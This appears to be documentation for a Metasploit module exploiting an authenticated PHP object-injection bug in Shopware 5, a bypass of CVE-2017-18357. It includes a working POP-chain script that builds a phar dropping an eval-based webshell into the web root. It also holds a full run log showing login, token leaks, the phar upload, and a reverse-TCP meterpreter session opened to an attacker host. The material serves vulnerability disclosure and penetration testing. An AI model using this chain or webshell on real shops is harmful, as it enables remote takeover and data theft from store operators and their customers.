
## Vulnerable Application

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to the ability of leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.

The following is the exact setup I used to test and analyze the vulnerability:

- Debian GNU/Linux 9 (stretch) x64
- MariaDB latest
- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).

### Notes

The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

### POP Chain

In order to pivot from an object instantiation bug to a object injection primitive, we need something worth while deserializing:

```php
<?php

namespace GuzzleHttp\Cookie;

// pop chain
interface ToArrayInterface {}

class SetCookie implements ToArrayInterface {
    private $data;

    public function __construct(array $data = []){
        $this->data = $data;
    }
}

class CookieJar implements ToArrayInterface {
    private $cookies;

    public function setCookie(SetCookie $cookie){
        $this->cookies = array($cookie);
    }
}

class FileCookieJar extends CookieJar {
    private $filename;

    public function __construct($bd_file){
        $this->filename = $bd_file;
        $this->setCookie(new SetCookie(array(
            "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
            "Expires" => true,
            "Discard" => false,
        )));
    }
}

$phar = new \Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$o = new FileCookieJar("/var/www/html/media/image/si.php");
$phar->setMetadata($o);
$phar->stopBuffering();
?>
```

## Scenarios

```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter > 
```
